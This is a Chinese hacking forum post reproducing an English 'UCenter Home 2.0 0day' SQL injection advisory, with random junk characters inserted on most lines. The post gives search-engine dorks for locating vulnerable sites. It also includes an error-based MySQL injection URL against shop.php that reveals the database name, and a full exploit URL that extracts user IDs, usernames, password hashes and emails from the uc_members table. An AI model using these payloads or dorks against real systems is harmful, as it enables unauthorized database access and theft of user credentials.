找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2141|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

7 I" N6 o$ {* X3 |. e/ q& k__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
  m3 k  b/ B& A( q, D8 ?. L: ?
& `& |% W7 ^2 H; R* _4 c                                 $ Q3 f+ f1 X8 N* j2 g2 m
7 p0 W. d1 f) I+ Y* J7 }
*/ Author : KnocKout  
# Y4 o9 y) A: n# I% D* U( l6 L+ `' d4 n
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
6 {! |+ I5 ?) p$ f4 m$ y' p* h$ H  m* L4 d7 @' @5 S0 T. H- x
*/ Contact: knockoutr@msn.com  7 k, c  o! I' F& @: L# n) u7 ]9 \& P1 }

! V+ O+ Z3 C  A/ v9 B, b" a*/ Cyber-Warrior.org/CWKnocKout  % ^. \/ @0 N0 l+ ~& `) }/ o2 E! ^

2 h. Q4 X0 k5 j( ___--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  : |9 }6 p2 G2 N
0 P5 z) C- e$ S" V2 {/ b; s
Script : UCenter Home  
" R) J: J8 M2 y. x; ^
% C. h1 F$ T' B8 c# M6 sVersion : 2.0  3 P- s, n5 A9 _! R9 x  [* ^

7 Z; E# t; p: V, a- X  aScript HomePage : http://u.discuz.net/  8 k% X6 Z% S7 T8 u% u3 `# a
( b  q# u+ b" z' y2 M
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  7 O5 N6 Y) N" K! }1 Z1 w
/ K* [: }% n# X5 y
Dork : Powered by UCenter inurl:shop.php?ac=view  
4 l- a$ E9 r! u) i0 E; H1 L% ]3 x) B" ~; r
Dork 2 : inurl:shop.php?ac=view&shopid=  
5 C, n2 X- K- v+ U! D! d0 V' q$ k2 K* C: K
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  - N$ c  f7 n: K% ]! ^6 I! m! a

: n2 F4 d( }2 M) J% b& b# yVuln file : Shop.php  0 _2 U6 T' `8 |" c/ S" ^
# w; L$ s0 }. h4 L/ ~
value's : (?)ac=view&shopid=  6 _$ c' O7 L6 n: F! C
% |; C, {3 e2 r/ Z4 {" Q
Vulnerable Style : SQL Injection (MySQL Error Based)  " [0 z, g: i" y" u8 ?1 L  O
( u$ G7 L; Z* ~* i8 ]: b; ^+ ^; T
Need Metarials : Hex Conversion  
3 m3 C' d  Z/ ?" F3 p  P7 b) R+ H3 k& @& C9 G! q! w
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
2 y* u" c# U" R6 A5 ]; o5 H
" ]. e) S6 ]* K! NYour Need victim Database name.   
5 c  h! M8 q4 i3 {$ p, S6 q2 l2 A2 k5 L+ {
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  , o* y; U2 F& q& O0 k7 T0 k4 J
  D( g( q) a: F0 f* H# @; x
..  3 `6 y8 l2 Q9 E
* z: h' G% A+ s$ T3 n0 m' V- ^
DB : Okey.  
$ L3 l- m7 O8 }  r& |5 u2 C/ I- q* \
$ N1 g) ?7 Z" |1 `your edit DB `[TARGET DB NAME]`  
3 U2 G0 t4 z5 N: Z- h5 m$ p) U3 P- s8 y/ Q7 p' }9 ~
Example : 'hiwir1_ucenter'  ' U" x7 w0 l0 d8 D# q

& [7 K2 I7 h' Z* e5 Y8 J+ R7 lEdit : Okey.  
: v- n- S1 ~) z( Y
: d0 Z( Z/ O# z" R) ^Your use Hex conversion. And edit Your SQL Injection Exploit..  
- @5 P1 m- b2 n0 G; T6 p/ a9 w; P; @4 [% {% n9 G9 P
   & |+ r4 z! r6 t% U
7 f: ~& X* Z8 g, L0 \' D7 E
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
1 r( _# {7 w/ j  f3 A0 S; E! K$ T
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表